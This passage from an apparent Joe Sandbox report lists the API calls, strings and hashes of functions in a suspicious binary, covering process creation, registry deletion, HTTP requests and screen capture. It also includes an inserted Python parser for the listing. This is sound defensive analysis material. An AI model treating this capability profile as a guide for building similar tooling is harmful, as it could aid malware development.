                                                                                                                        • Instruction ID: b3122728a10f91d5f26426d0b86c766d0ab4d7bea99136e93a8158366580abd7
                                                                                                                        • Opcode Fuzzy Hash: 5f30679c007cdd16b1e8693ff721ccc44b44fe8e2f45fe8d13d713b40d4e05dc
                                                                                                                        • Instruction Fuzzy Hash: 3F613771108302AFD701DF54D889DAFBFE8FFD9750F00091AB595962A1DB309A49CB92
                                                                                                                        APIs
                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005300C6
                                                                                                                          • Part of subcall function 005300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(005E070C,00000FA0,BE39B01A,?,?,?,?,005523B3,000000FF), ref: 0053011C
                                                                                                                          • Part of subcall function 005300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,005523B3,000000FF), ref: 00530127
                                                                                                                          • Part of subcall function 005300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,005523B3,000000FF), ref: 00530138
                                                                                                                          • Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0053014E
                                                                                                                          • Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0053015C
                                                                                                                          • Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0053016A
                                                                                                                          • Part of subcall function 005300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00530195
                                                                                                                          • Part of subcall function 005300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005301A0
                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 005300E7
                                                                                                                          • Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9
                                                                                                                        Strings
                                                                                                                        • WakeAllConditionVariable, xrefs: 00530162
                                                                                                                        • SleepConditionVariableCS, xrefs: 00530154
                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00530122
                                                                                                                        • kernel32.dll, xrefs: 00530133
                                                                                                                        • InitializeConditionVariable, xrefs: 00530148
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                        • API String ID: 66158676-1714406822
                                                                                                                        • Opcode ID: 7b9d8a64aef4c36090ce989931249560b62d120c9820ec9e071151759eed3783
                                                                                                                        • Instruction ID: 2b027beda6b6cd48bbc23366fbf28800fc68745221f96054de72aafd0fca023f
                                                                                                                        • Opcode Fuzzy Hash: 7b9d8a64aef4c36090ce989931249560b62d120c9820ec9e071151759eed3783
                                                                                                                        • Instruction Fuzzy Hash: 63212632A407116BE7256BA4BC59B2E7FE8FB56B61F00113AF801E72D1DBB09C04DB90
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,005ACC08), ref: 00584527
                                                                                                                        • _wcslen.LIBCMT ref: 0058453B
                                                                                                                        • _wcslen.LIBCMT ref: 00584599
                                                                                                                        • _wcslen.LIBCMT ref: 005845F4
                                                                                                                        • _wcslen.LIBCMT ref: 0058463F
                                                                                                                        • _wcslen.LIBCMT ref: 005846A7
                                                                                                                          • Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD
                                                                                                                        • GetDriveTypeW.KERNEL32(?,005D6BF0,00000061), ref: 00584743
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                        • API String ID: 2055661098-1000479233
                                                                                                                        • Opcode ID: 045060e17fed9ee865c530bf999c969e4fb017f404a13b153530e7888972d2fe
                                                                                                                        • Instruction ID: 52e427e6f0860e730395d9f9e12390ecf223d89397b3e5b1e8fc89aba3b4b925
                                                                                                                        • Opcode Fuzzy Hash: 045060e17fed9ee865c530bf999c969e4fb017f404a13b153530e7888972d2fe
                                                                                                                        • Instruction Fuzzy Hash: F2B19D316083039BC710EF28C894A6EBBE5BFA5764F50491DF896E7291E730D985CB92
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?), ref: 005A6DEB
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 005A6E5F
                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 005A6E81
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A6E94
                                                                                                                        • DestroyWindow.USER32(?), ref: 005A6EB5
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00510000,00000000), ref: 005A6EE4
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A6EFD
                                                                                                                        • GetDesktopWindow.USER32 ref: 005A6F16
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 005A6F1D
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005A6F35
                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 005A6F4D
                                                                                                                          • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                        • String ID: 0$@U=u$tooltips_class32
                                                                                                                        • API String ID: 2429346358-1130792468
                                                                                                                        • Opcode ID: 506a175e713a4fc56172da299d6a9a383f13efea5092c41f58e99756c52f6758
                                                                                                                        • Instruction ID: 3203997087ab0fa708173287b07fd1d54867da02243f37f160fb88a70989983f
                                                                                                                        • Opcode Fuzzy Hash: 506a175e713a4fc56172da299d6a9a383f13efea5092c41f58e99756c52f6758
                                                                                                                        • Instruction Fuzzy Hash: 92715B74144245AFDB25CF18DC84FABBFE9FB9A304F08041DF9998B2A1C770A949DB15
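The function entries above all share one layout: an APIs list of `Api.MODULE(args), ref: ADDR` lines (lines attributed to a callee carry a `Part of subcall function ADDR:` prefix), an optional Strings list, and a Similarity block whose Opcode ID and Instruction ID can be used to pivot to the same function in other samples. The Python below is an added example, not Joe Sandbox's own tooling, that parses that layout, separates a function's own calls from sub-call attributions, checks an entry for an ordered API pattern such as the file-to-HGLOBAL-to-OleLoadPicture sequence in the first entry, and resolves the uMsg argument of the SendMessageW/DefDlgProcW calls in the image, drop-files and tooltip entries to their Windows SDK names. The message table is limited to the constants visible on this page, and the sample input is constructed from trimmed excerpts of the entries above.

```python
"""Parse the Joe Sandbox IDA-plugin function listing shown on this page: an "APIs"
list of "Api.MODULE(args), ref: ADDR" lines (sub-call attributions prefixed with
"Part of subcall function ADDR:"), an optional "Strings" list, and an ID block."""
import re

# uMsg values that occur in the listing above, named per the Windows SDK headers;
# the table is deliberately limited to constants visible on this page.
MSG_NAMES = {
    0x00B0: "EM_GETSEL", 0x00B1: "EM_SETSEL", 0x00C2: "EM_REPLACESEL",
    0x0172: "STM_SETIMAGE", 0x0233: "WM_DROPFILES",
    0x0418: "TTM_SETMAXTIPWIDTH", 0x0421: "TTM_SETTITLEW",
    0x0432: "TTM_ADDTOOLW", 0x0433: "TTM_DELTOOLW",
}

# Argument list and the comma before "ref:" are absent for calls such as
# "GetDesktopWindow.USER32 ref: 005A6F16".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
ID_RE = re.compile(r"^•\s*(?P<key>Opcode ID|Instruction ID|API ID|String ID):\s*(?P<val>.*)$")

def parse_listing(text):
    """Return one record per function: its calls in listing order plus its ID fields."""
    entries, cur, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": [], "ids": {}}
            entries.append(cur)
            in_apis = True
            continue
        if cur is None:
            continue
        if line == "Strings":            # end of the call list for this entry
            in_apis = False
        m = API_RE.match(line) if in_apis else None
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur["calls"].append({"api": m["api"], "module": m["mod"], "args": args,
                                 "ref": int(m["ref"], 16), "subcall": m["sub"]})
            continue
        m = ID_RE.match(line)
        if m:
            cur["ids"][m["key"]] = m["val"].strip()
    return entries

def direct_apis(entry):
    """API names the function calls itself, in order; sub-call attributions dropped."""
    return [c["api"] for c in entry["calls"] if c["subcall"] is None]

def contains_sequence(entry, pattern):
    """True if `pattern` is an ordered (not necessarily contiguous) subsequence of the
    function's own calls, so a behaviour can be tagged without exact argument values."""
    it = iter(direct_apis(entry))
    return all(any(api == want for api in it) for want in pattern)

def decode_messages(entry):
    """Resolve the uMsg argument of SendMessageW/DefDlgProcW calls to symbolic names."""
    out = []
    for c in entry["calls"]:
        if c["api"] not in ("SendMessageW", "DefDlgProcW") or len(c["args"]) < 2:
            continue
        try:
            msg = int(c["args"][1], 16)
        except ValueError:               # placeholder argument such as "?"
            continue
        out.append((c["ref"], MSG_NAMES.get(msg, f"0x{msg:04X}")))
    return out

# Pattern for "read a file into an HGLOBAL and hand it to OleLoadPicture".
LOAD_PICTURE_FROM_FILE = ["GetFileSize", "GlobalAlloc", "ReadFile",
                          "CreateStreamOnHGlobal", "OleLoadPicture"]

# Constructed sample: three entries from the listing above, trimmed to the
# lines the parser uses (the deep indentation of the original is irrelevant).
SAMPLE = """\
APIs
• GetFileSize.KERNEL32(00000000,00000000), ref: 005A85A2
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 005A85AD
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005A85D7
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 005A85F8
• OleLoadPicture.OLEAUT32(?,00000000,00000000,005AFC38,?), ref: 005A8611
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005A86AF
Strings
• Opcode ID: c142638163b670bec78de0c767baafebf5741859c793f1e3d40871ee5266ff19
APIs
  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
• DragQueryPoint.SHELL32(?,?), ref: 005A9147
• SendMessageW.USER32(?,000000B0,?,?), ref: 005A91B0
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 005A9225
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 005A9371
APIs
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A6EFD
• GetDesktopWindow.USER32 ref: 005A6F16
"""

if __name__ == "__main__":
    for n, e in enumerate(parse_listing(SAMPLE)):
        print(n, e["ids"].get("Opcode ID", "-")[:16], direct_apis(e),
              contains_sequence(e, LOAD_PICTURE_FROM_FILE), decode_messages(e))
```

Matching on an ordered subsequence rather than on exact arguments keeps the check stable across builds where the Instruction Fuzzy Hash changes but the call order does not; the Opcode ID is the better pivot when looking for the identical function in another sample.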
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 0059B198
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0059B1B0
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0059B1D4
                                                                                                                        • _wcslen.LIBCMT ref: 0059B200
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0059B214
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0059B236
                                                                                                                        • _wcslen.LIBCMT ref: 0059B332
                                                                                                                          • Part of subcall function 005805A7: GetStdHandle.KERNEL32(000000F6), ref: 005805C6
                                                                                                                        • _wcslen.LIBCMT ref: 0059B34B
                                                                                                                        • _wcslen.LIBCMT ref: 0059B366
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0059B3B6
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0059B407
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0059B439
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059B44A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059B45C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059B46E
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0059B4E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
• String ID:
• API String ID: 2178637699-0
• Opcode ID: a802dd83edef671cc6e922b0bf79ccfd73e64253612c266dd0a3944775f61d4c
• Instruction ID: 22fa9e0d10ca38dedbe654ad8102f7799fe74ffb57dea26696b9a8f2fa066a33
• Opcode Fuzzy Hash: a802dd83edef671cc6e922b0bf79ccfd73e64253612c266dd0a3944775f61d4c
• Instruction Fuzzy Hash: 20F189316043019FEB14EF24D999B6ABFE5BF85310F14895DF8899B2A2DB31EC44CB52

APIs
• GetMenuItemCount.USER32(005E1990), ref: 00552F8D
• GetMenuItemCount.USER32(005E1990), ref: 0055303D
• GetCursorPos.USER32(?), ref: 00553081
• SetForegroundWindow.USER32(00000000), ref: 0055308A
• TrackPopupMenuEx.USER32(005E1990,00000000,?,00000000,00000000,00000000), ref: 0055309D
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005530A9
Strings
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
• Opcode ID: d7c98a3af3ab0c9bd6df4104012c2c044a401c71312918d80e350a9417940001
• Instruction ID: af02a0ea856ff7407d1511b743f0a84c1853f589062e0e377b662b911064c1d2
• Opcode Fuzzy Hash: d7c98a3af3ab0c9bd6df4104012c2c044a401c71312918d80e350a9417940001
• Instruction Fuzzy Hash: 59710C30640206BEFB259F64DC99FAABF68FF06364F204216F9256A1E0C7B1AD54D750

APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058C4B0
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0058C4C3
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0058C4D7
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0058C4F0
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0058C533
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0058C549
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0058C554
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0058C584
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0058C5DC
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0058C5F0
• InternetCloseHandle.WININET(00000000), ref: 0058C5FB
Strings
Similarity
• API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
• String ID:
• API String ID: 3800310941-3916222277
• Opcode ID: 0de946ff81234d531bb964b90ed3ced2c8a42ee93e6055016db4283a3cf7c6ac
• Instruction ID: 2b1830867d0f22beec1514f2e3adb9b94de766b10f3f2ae826bf00e9bb3cd1cd
• Opcode Fuzzy Hash: 0de946ff81234d531bb964b90ed3ced2c8a42ee93e6055016db4283a3cf7c6ac
• Instruction Fuzzy Hash: 4F515DB1500205BFEB21AF64C948ABB7FFCFF19754F00441AF945A6210DB34E948AB70

APIs
• VariantInit.OLEAUT32(00000000), ref: 00581502
• VariantCopy.OLEAUT32(?,?), ref: 0058150B
• VariantClear.OLEAUT32(?), ref: 00581517
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 005815FB
• VarR8FromDec.OLEAUT32(?,?), ref: 00581657
• VariantInit.OLEAUT32(?), ref: 00581708
• SysFreeString.OLEAUT32(?), ref: 0058178C
• VariantClear.OLEAUT32(?), ref: 005817D8
• VariantClear.OLEAUT32(?), ref: 005817E7
• VariantInit.OLEAUT32(00000000), ref: 00581823
Strings
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 1234038744-3931177956
• Opcode ID: 20f2eb5d2d91abfd9fa27665fd2662d76610ecf7fddadbe8545b4fe00e8cf82f
• Instruction ID: 980ad9e6b04b45b22e0d3514e6d0f2b74c22002dd6da3711dbea11301e905e12
• Opcode Fuzzy Hash: 20f2eb5d2d91abfd9fa27665fd2662d76610ecf7fddadbe8545b4fe00e8cf82f
• Instruction Fuzzy Hash: 4BD1E271A00916DBDB10AF65E889B7DBFB9BF86700F10846AE846BB180DB30DC46DF55

APIs
  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
  • Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059B6F4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059B772
• RegDeleteValueW.ADVAPI32(?,?), ref: 0059B80A
• RegCloseKey.ADVAPI32(?), ref: 0059B87E
• RegCloseKey.ADVAPI32(?), ref: 0059B89C
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 0059B8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0059B904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0059B922
• FreeLibrary.KERNEL32(00000000), ref: 0059B983
• RegCloseKey.ADVAPI32(00000000), ref: 0059B994
Strings
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: 6a1a88d45215d4979a5948132567b1484d54f2d3b5c5c73003281dc6ee59eb80
• Instruction ID: 4ec804f3d070aa3baf3fd6b8bd418a48a303274b3022ac858df8b860c9b2d091
• Opcode Fuzzy Hash: 6a1a88d45215d4979a5948132567b1484d54f2d3b5c5c73003281dc6ee59eb80
• Instruction Fuzzy Hash: B9C17D30204202AFEB10DF14D599F6ABFE5FF84308F14855CE59A4B2A2CB75ED86CB91

APIs
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 005A5504
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A5515
• CharNextW.USER32(00000158), ref: 005A5544
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 005A5585
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 005A559B
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A55AC
Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CharNext
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 1350042424-2594219639
                                                                                                                        • Opcode ID: d5886003ec15155a33efa9b38eafa08cfe157a35db590d3bee6c0fb55c518d32
                                                                                                                        • Instruction ID: ea8e2b4be976ada3c33e14a844faf45e9a5f019e2946aaab4e145fcb64cc028e
                                                                                                                        • Opcode Fuzzy Hash: d5886003ec15155a33efa9b38eafa08cfe157a35db590d3bee6c0fb55c518d32
                                                                                                                        • Instruction Fuzzy Hash: D7615931904609EFDF119F64CC84EBE7FB9FB1A720F104545FA25AB290E7748A84DB60
APIs
• GetDC.USER32(00000000), ref: 005925D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005925E8
• CreateCompatibleDC.GDI32(?), ref: 005925F4
• SelectObject.GDI32(00000000,?), ref: 00592601
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0059266D
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 005926AC
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 005926D0
• SelectObject.GDI32(?,?), ref: 005926D8
• DeleteObject.GDI32(?), ref: 005926E1
• DeleteDC.GDI32(?), ref: 005926E8
• ReleaseDC.USER32(00000000,?), ref: 005926F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 5c2cf2da8845943059c626156fcb514df7823f3a36b976771d72467e806eedf8
• Instruction ID: 3c1a2fd0e8e0f01e1f23edcf63cf8a97ac779e41231635b2ac480e4f37ea9cc5
• Opcode Fuzzy Hash: 5c2cf2da8845943059c626156fcb514df7823f3a36b976771d72467e806eedf8
• Instruction Fuzzy Hash: A061D275E00219EFCF05CFA8D988AAEBBF5FF58310F208529E956A7250D770A941DF90
APIs
• timeGetTime.WINMM ref: 0057E6B4
  • Part of subcall function 0052E551: timeGetTime.WINMM(?,?,0057E6D4), ref: 0052E555
• Sleep.KERNEL32(0000000A), ref: 0057E6E1
• EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0057E705
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0057E727
• SetActiveWindow.USER32 ref: 0057E746
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0057E754
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0057E773
• Sleep.KERNEL32(000000FA), ref: 0057E77E
• IsWindow.USER32 ref: 0057E78A
• EndDialog.USER32(00000000), ref: 0057E79B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: @U=u$BUTTON
• API String ID: 1194449130-2582809321
• Opcode ID: a494808b6dc206de66f1f48140752f687c2c423c56e22be94da2a861d6eeeb14
• Instruction ID: f073b9751afbd4aa994e19799cc77203efcd0e95fc8a64b490d8719a6423eb07
• Opcode Fuzzy Hash: a494808b6dc206de66f1f48140752f687c2c423c56e22be94da2a861d6eeeb14
• Instruction Fuzzy Hash: 4B2162B0200385AFEF045F25FCCAA253F6DF77A349F108465F549861A5DFB1AC08BA24
APIs
• ___free_lconv_mon.LIBCMT ref: 0054DAA1
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D659
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D66B
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D67D
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D68F
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6A1
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6B3
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6C5
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6D7
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6E9
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6FB
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D70D
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D71F
  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D731
• _free.LIBCMT ref: 0054DA96
  • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
  • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
• _free.LIBCMT ref: 0054DAB8
• _free.LIBCMT ref: 0054DACD
• _free.LIBCMT ref: 0054DAD8
• _free.LIBCMT ref: 0054DAFA
• _free.LIBCMT ref: 0054DB0D
• _free.LIBCMT ref: 0054DB1B
• _free.LIBCMT ref: 0054DB26
• _free.LIBCMT ref: 0054DB5E
• _free.LIBCMT ref: 0054DB65
• _free.LIBCMT ref: 0054DB82
• _free.LIBCMT ref: 0054DB9A
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
